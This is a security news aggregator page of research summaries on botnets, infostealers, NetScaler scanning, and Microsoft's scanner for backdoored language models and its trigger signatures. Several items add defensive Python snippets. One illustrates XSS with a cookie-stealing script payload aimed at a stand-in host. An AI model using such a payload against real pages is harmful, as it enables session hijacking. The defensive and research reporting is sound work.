<ciso brief />

All news with #research tag

199 articles · page 3 of 10

New Linux botnet SSHStalker uses IRC for C2 comms

🛡️ A newly documented Linux botnet named SSHStalker uses the legacy IRC protocol for command-and-control while relying on noisy SSH scanning and brute forcing for initial access. Researchers at Flare say it deploys a Go binary masquerading as nmap, compiles C-based IRC bots on hosts, and persists via cron jobs that run every 60 seconds. The kit favors scale and reliability over stealth, reuses a back-catalog of decade-plus-old CVEs for privilege escalation, and includes AWS key harvesting, cryptomining, and dormant DDoS code.
read more →
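The report notes persistence via cron jobs that fire every 60 seconds. A minimal hunting sketch for that pattern is below; the sample paths and the heuristic itself are illustrative assumptions, not tooling from the Flare report.

```python
# Flag crontab entries scheduled every minute ("* * * * *"), a pattern
# consistent with the 60-second persistence loop described above.
# Sample paths are hypothetical.

def suspicious_cron_lines(crontab_text: str) -> list[str]:
    """Return non-comment lines whose schedule runs every minute."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        fields = stripped.split()
        # First five fields all "*" means the job runs every minute.
        if len(fields) >= 6 and fields[:5] == ["*"] * 5:
            hits.append(stripped)
    return hits

sample = """
# m h dom mon dow command
*/5 * * * * /usr/bin/logrotate
* * * * * /tmp/.nmap/update.sh
"""
print(suspicious_cron_lines(sample))
```

Run against `crontab -l` output (and `/etc/cron.d/*`) per user; every-minute jobs are rare enough in most fleets to be worth a manual look.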

Muddled Libra Rogue VM Playbook and Operational Tactics

🔐 Unit 42 recovered a rogue VM created by Muddled Libra (aka Scattered Spider, UNC3944) during a September 2025 incident, revealing an operational playbook of reconnaissance, credential theft, lateral movement and data access. The actors abused legitimate tools and stolen certificates, persisted via an SSH tunnel (Chisel), and copied NTDS.dit and SYSTEM hives. Unit 42 recommends strengthening identity controls and adopting Advanced WildFire and Cortex defenses.
read more →

LLMs Accelerate Zero-Day Discovery: Opus 4.6 Advances

🔎 Claude Opus 4.6 markedly improves automated vulnerability discovery, finding high-severity bugs faster and without task-specific tooling. Unlike traditional fuzzers, which depend on massive random inputs, Opus 4.6 reads and reasons about code like a human researcher—spotting patterns, past fixes, and precise inputs that trigger failures. Early tests show it uncovered long-standing zero-days in projects previously subject to extensive fuzzing.
read more →

Smartphones Now Central to Nearly Every Police Probe

🔍 A Cellebrite 2026 Industry Trends Report based on 1,200 law enforcement respondents across 63 countries finds digital evidence — particularly from smartphones — has become central to almost all investigations. Some 95% of practitioners say digital evidence is key to solving cases and 97% point to smartphones as a top source. Agencies report increasing complexity, locked devices in over half of cases, and growing resource reallocations to handle digital work, while many see AI as useful but constrained by policy.
read more →

Microsoft Builds Scanner to Detect Backdoors in LLMs

🔍 Microsoft has developed a lightweight scanner to detect backdoors in open-weight large language models (LLMs) by evaluating three observable signals tied to internal model behavior. The tool extracts memorized content, isolates suspect substrings, and scores candidates with loss functions that formalize attention and output anomalies. The approach requires no additional training and runs across common GPT‑style models, but it needs access to model files and is best suited for trigger-based, deterministic backdoors.
read more →

Detecting Backdoored Language Models at Scale — Practical Scanner

🔍 Microsoft researchers released new findings and a practical scanner for detecting backdoors in open-weight language models. The study identifies three signatures — a distinctive “double triangle” attention pattern, leakage of poisoning training data through memorization, and trigger “fuzziness” — and uses them to reconstruct likely triggers without retraining. The scanner requires only forward passes, works on GPT-like models, and was validated across 270M–14B models and common fine-tuning regimes. The team notes limits: it needs model file access, favors deterministic backdoors, and should be used as part of layered defenses.
read more →
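Both write-ups describe scoring candidates against three signals (anomalous attention, memorized poisoning data, trigger fuzziness). The combination below is purely illustrative; the weights and formula are assumptions, not Microsoft's published loss functions.

```python
# Illustrative scoring only: a weighted combination of the three
# backdoor signals named in the articles. Weights are assumptions.

def score_candidate(attention_anomaly: float,
                    memorization_leak: float,
                    trigger_fuzziness: float,
                    weights=(0.4, 0.4, 0.2)) -> float:
    """Combine three signals in [0, 1] into one suspicion score.

    Lower fuzziness means a more deterministic (more suspect) trigger,
    so that signal is inverted before weighting.
    """
    signals = (attention_anomaly, memorization_leak, 1.0 - trigger_fuzziness)
    return sum(w * s for w, s in zip(weights, signals))

# A candidate with strong attention anomaly, strong memorization leak,
# and a near-deterministic trigger scores high.
print(round(score_candidate(0.9, 0.8, 0.1), 2))  # 0.86
```

The design point the research makes survives the simplification: each signal is cheap to compute from forward passes alone, so no retraining is needed to rank candidate triggers.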

Massive Citrix NetScaler Scans Use Residential Proxies

🔎 GreyNoise observed a coordinated reconnaissance campaign from Jan 28–Feb 2 that used tens of thousands of residential proxies to discover Citrix NetScaler/Citrix Gateway login panels and enumerate product versions. Over 63,000 distinct IPs launched 111,834 sessions, with roughly 64% appearing as residential ISP addresses and the remainder linked to a single Azure IP. The scans concentrated on /logon/LogonPoint/index.html and the EPA artifact /epa/scripts/win/nsepa_setup.exe, indicating pre‑exploitation mapping and version‑specific probing. GreyNoise recommends monitoring anomalous UA strings, flagging EPA artifact access, restricting internet‑facing Gateways, and disabling version disclosure.
read more →
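The two paths GreyNoise calls out are concrete enough to triage for in gateway access logs. A sketch, assuming a common/combined log layout (field positions will differ in your environment):

```python
# Triage pass for the two NetScaler paths observed in the campaign.
# Log parsing here assumes combined-log-format field order.

WATCHED_PATHS = (
    "/logon/LogonPoint/index.html",
    "/epa/scripts/win/nsepa_setup.exe",
)

def flag_recon_requests(log_lines):
    """Yield (client_ip, path) for requests touching the watched paths."""
    for line in log_lines:
        parts = line.split()
        if len(parts) < 7:
            continue
        ip, path = parts[0], parts[6]   # ip ... "METHOD path HTTP/x"
        if any(path.startswith(p) for p in WATCHED_PATHS):
            yield ip, path

sample = [
    '203.0.113.9 - - [01/Feb/2026:10:00:00 +0000] "GET /logon/LogonPoint/index.html HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Feb/2026:10:00:01 +0000] "GET /healthz HTTP/1.1" 200 2',
]
print(list(flag_recon_requests(sample)))
```

Counting distinct flagged IPs over a window is a cheap proxy for the proxy-distributed scanning pattern described above.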

Nearly 400 Malicious OpenClaw Crypto Trading Skills

⚠️ Security researcher Paul McCarty (aka 6mile) has identified 386 malicious OpenClaw "skills" on the ClawHub repository that impersonate crypto trading tools. The add-ons use social engineering to trick users into executing commands that deploy infostealers on macOS and Windows, harvesting exchange API keys, wallet private keys, SSH credentials and browser passwords. The discovered skills share a common C2 IP (91.92.242.30) and many remain available, with the most active uploader accounting for nearly 7,000 downloads.
read more →
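Since the skills share a single reported C2 address, a straightforward IOC sweep of an installed skill directory is a reasonable first check. The sweep below is a generic sketch; the directory layout is hypothetical.

```python
# Sweep a directory tree for the shared C2 address reported above.
# Where skills are installed on disk varies; pass your own root path.

import os

C2_IOC = "91.92.242.30"

def files_containing_ioc(root: str) -> list[str]:
    """Return sorted paths of files whose text contains the C2 IOC."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as fh:
                    if C2_IOC in fh.read():
                        hits.append(path)
            except OSError:
                continue
    return sorted(hits)
```

A hit is grounds for removal and credential rotation (exchange API keys, wallet keys, SSH keys), given the infostealer behavior described above.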

AI Agent Identity Management: New Control Plane for CISOs

🔐 AI agents—custom GPTs, copilots, coding agents and other autonomous tooling—are proliferating in production while remaining largely outside traditional IAM, PAM, and IGA controls. The piece argues for treating agents as a distinct identity class and applying continuous identity lifecycle management to ensure visibility, ownership, dynamic least privilege, and auditability. Rather than slowing adoption, this approach positions identity as the control plane for balancing innovation and security.
read more →

Over 80% of Ethical Hackers Now Use AI in Workflows

🤖 Bugcrowd's survey of 2,000 security researchers found 82% now incorporate AI into their workflows, up from 64% in 2023. Respondents highlighted automation of repetitive tasks, analysis of messy or large codebases, and AI as a research assistant as primary use cases. Organizations gain faster, more comprehensive and higher-quality findings without necessarily increasing budgets. The report also notes stronger outcomes from team collaboration and outlines key community demographics.
read more →

Airlock Digital Forrester TEI Finds 224% ROI and $3.8M NPV

🔒 The Forrester Consulting Total Economic Impact (TEI) study commissioned by Airlock Digital reports a 224% ROI and a $3.8 million net present value over three years for organizations that adopt Airlock’s allowlisting approach. The analysis cites a >25% reduction in overall breach risk and notes zero breaches among interviewed customers after deployment. It also highlights operational efficiency gains — policy management requiring roughly 2.5 hours per week — and reduced administrative overhead thanks to Airlock’s modern, operationally friendly implementation of allowlisting.
read more →
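The headline figures can be sanity-checked with the usual TEI arithmetic. Assuming Forrester's standard definition (ROI = NPV of net benefits divided by present value of costs), the implied cost base follows directly; the cost figure below is an inference, not a number from the study.

```python
# Back-of-envelope check on the TEI figures, assuming
# ROI = NPV / PV(costs). Implied costs are inferred, not published.

def implied_pv_costs(npv_musd: float, roi: float) -> float:
    """Recover present value of costs from NPV and ROI."""
    return npv_musd / roi

roi = 2.24   # 224%
npv = 3.8    # $3.8M over three years
costs = implied_pv_costs(npv, roi)
print(f"implied PV of costs:    ${costs:.2f}M")          # ~$1.70M
print(f"implied PV of benefits: ${npv + costs:.2f}M")    # ~$5.50M
```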

VoidLink cloud malware shows clear signs of AI generation

🧠 Check Point Research reports that the VoidLink Linux cloud malware framework displays clear evidence of being developed predominantly with AI assistance. The actor used an AI-centric IDE, TRAE, and its assistant TRAE SOLO to produce specification documents, sprint plans, and large portions of source code, which reached a working state within days. Exposed development artifacts — including TRAE helper files and an open directory of source and docs — allowed researchers to match generated specs to the recovered code and reproduce the development workflow, leading Check Point to conclude this is a notable example of AI-driven malware development.
read more →

Azure Private Endpoint DNS Risks Can Cause Service DoS

🔒 Unit 42 researchers discovered an Azure Private Endpoint DNS behavior that can unintentionally or deliberately produce denial-of-service conditions for Azure services. In several scenarios — accidental internal, accidental vendor, and malicious actor — linking a Private DNS zone to a virtual network can force name resolution to the private zone and fail when no A record exists, breaking connectivity to otherwise public endpoints. Microsoft documents a partial mitigation (fallback to internet); alternatives include manually adding DNS records and performing comprehensive discovery with Resource Graph.
read more →
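The failure mode is easiest to see as a resolution-precedence rule: a private DNS zone linked to a VNet becomes authoritative for its suffix, with no fallback to public DNS. The toy model below collapses Azure's real behavior (which involves `privatelink.*` zones and a CNAME hop) into one lookup; names and addresses are illustrative.

```python
# Toy model of the DNS behavior Unit 42 describes. A linked private
# zone shadows its suffix entirely: if the zone has no A record, the
# name fails to resolve even though a public record exists.
# (Simplified: real Azure uses privatelink.* zones plus a CNAME step.)

PUBLIC_DNS = {"storacct.blob.core.windows.net": "20.60.1.1"}

def resolve(name, linked_private_zones):
    """Resolve name; any linked private zone is authoritative for its suffix."""
    for zone, records in linked_private_zones.items():
        if name == zone or name.endswith("." + zone):
            return records.get(name)   # no fallback to public DNS
    return PUBLIC_DNS.get(name)

# Before linking: public resolution works.
print(resolve("storacct.blob.core.windows.net", {}))
# After linking an empty zone: resolution fails -> service DoS.
print(resolve("storacct.blob.core.windows.net", {"blob.core.windows.net": {}}))
```

This is why the mitigations above center on either adding the missing records to the private zone or enabling fallback-to-internet where Microsoft supports it.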

The AI Fix #84: Hungry ghost, data poisoning, Grok

🤖 In episode 84 of The AI Fix, hosts Graham Cluley and Mark Stockley survey a series of recent AI developments that raise practical and philosophical questions. They discuss reports that Grok will be integrated into Pentagon networks, a campaign by insiders to poison training data, and research showing small amounts of tainted data can sway model behavior. The episode also covers Google removing AI health overviews after risky outputs, findings that asking a model the same question twice can improve answers, and surprising advances in automated theorem solving.
read more →

Researchers Exploit XSS in StealC Panel to Gather Evidence

🔍 CyberArk researchers disclosed they exploited a cross-site scripting (XSS) vulnerability in the web panel of the StealC infostealer to retrieve active session cookies and operational metadata. Researcher Ari Novick used the weakness to link a StealC customer, dubbed YouTubeTA, to the theft of roughly 390,000 passwords and over 30 million cookies from victims seeking cracked Adobe software on YouTube. Analysis of hardware fingerprints, language settings, time zones and IP addresses indicated the operator used a MacBook Pro with an M3 chip, supported English and Russian, operated in an Eastern European time zone and connected via Ukrainian ISP TRK Cable TV. The case underscores how weaknesses in criminal tooling can expose both victims and customers to supply-chain risk.
read more →

XSS Flaw in StealC Panel Lets Researchers Monitor Operators

🔍 Cybersecurity researchers disclosed an XSS vulnerability in the web-based control panel used by operators of the StealC information stealer. By exploiting it they collected system fingerprints, monitored active sessions, and stole session cookies from the infrastructure itself, according to CyberArk researcher Ari Novick. The panel's leaked source code and the stealer's distribution through the YouTube Ghost Network and other lures amplified the operational insights researchers gained. Full technical details were withheld to avoid enabling copycats.
read more →

Researchers Hijack StealC Panels via XSS, Expose Operators

🔒 A cross-site scripting (XSS) flaw in the web control panel for the StealC info‑stealer allowed researchers to observe active operator sessions, capture session cookies and harvest browser and hardware fingerprints. CyberArk exploited the issue to identify an operator’s location and device details after a panel user failed to route traffic through a VPN. The company withheld technical disclosure to avoid a quick fix and said the finding may disrupt StealC’s MaaS ecosystem.
read more →
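All three StealC items describe the same bug class: a panel rendering bot-supplied victim data without escaping, so a crafted field runs script in the operator's browser. A generic illustration of the class (not StealC's actual code), using Python's standard-library escaping:

```python
# Generic illustration of the panel XSS bug class, not StealC's code:
# rendering untrusted "victim" fields without escaping lets a crafted
# record execute script in whoever views the panel.

from html import escape

def render_row_unsafe(hostname: str) -> str:
    return f"<td>{hostname}</td>"            # vulnerable: raw interpolation

def render_row_safe(hostname: str) -> str:
    return f"<td>{escape(hostname)}</td>"    # escapes <, >, &, and quotes

payload = '<script>fetch("//evil/?c="+document.cookie)</script>'
print(render_row_unsafe(payload))   # script tag survives into the page
print(render_row_safe(payload))     # rendered inert as text
```

The same mistake in defensive tooling is routinely exploited the other way; here it happened to work in researchers' favor.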

AI Image Leaks Fuel New Wave of Sextortion Risks Worldwide

⚠️ Researchers in 2025 discovered multiple unsecured databases of AI-generated images and videos, many depicting sexualized or fabricated nudes created from everyday photos. Analysis pointed to third-party generative tools such as MagicEdit and DreamPal, which offered explicit editing, face‑swap and clothing‑change features and, in some cases, disabled filters for erotic content. The exposure highlights how generative AI lowers the barrier to producing convincing fake intimate images and broadens the pool of potential sextortion victims. The post urges tightening social media privacy, using tools like Privacy Checker, and monitoring children with Kaspersky Safe Kids.
read more →

Privacy Teams Shrink as Stress and Funding Fall Short

📉 ISACA's State of Privacy 2026 report reveals privacy teams are shrinking and underfunded despite mounting regulatory and technological pressures. The median privacy staff size fell to five from eight year-over-year, and technical privacy roles are notably understaffed while demand for those skills rises. Respondents report increased stress—35% say their role is 'significantly more stressful' and 30% 'slightly more stressful'—attributed to rapid tech evolution, compliance complexity and resource shortages. To close skill gaps, organizations are training interested non-privacy staff and increasing reliance on contractors, consultants and planned AI tools for privacy tasks.
read more →

Palo Alto Networks Automates DORs with Agentic AI Design

🤖 Palo Alto Networks automated creation of its internal Document of Record (DOR) using an agent built with Google's open-source Agent Development Kit (ADK) and hosted on Vertex AI Agent Engine. The agent leverages Vertex AI RAG Engine, Vertex AI Discovery Search, Gemini models, and Cloud Storage to retrieve and synthesize grounded answers to a standardized set of 140+ questions. A FastAPI webserver on GKE orchestrates parallel processing, manages state, and publishes completed DORs back to Salesforce via Cloud Pub/Sub, reducing manual effort and improving consistency.
read more →
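Stripped of the managed services named above (ADK, Vertex AI RAG Engine, Pub/Sub), the core pattern is a parallel fan-out over the standardized question set. The sketch below stands in for the agent call with a stub and shows only that orchestration shape; it is not Palo Alto's or Google's code.

```python
# Orchestration sketch only: a stub stands in for the retrieval-
# augmented agent call. What this shows is the parallel fan-out
# over the 140+ DOR questions, not the actual ADK/Vertex pipeline.

from concurrent.futures import ThreadPoolExecutor

def answer_question(question: str) -> str:
    """Stub for the grounded agent call (hypothetical)."""
    return f"grounded answer for: {question}"

def build_dor(questions: list[str], max_workers: int = 8) -> dict[str, str]:
    """Answer all questions concurrently, preserving question order."""
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        answers = pool.map(answer_question, questions)
    return dict(zip(questions, answers))

dor = build_dor([f"Q{i}" for i in range(1, 6)])
print(len(dor))   # 5
```

In the real system the per-question calls are I/O-bound service requests, which is why thread-pool-style parallelism pays off.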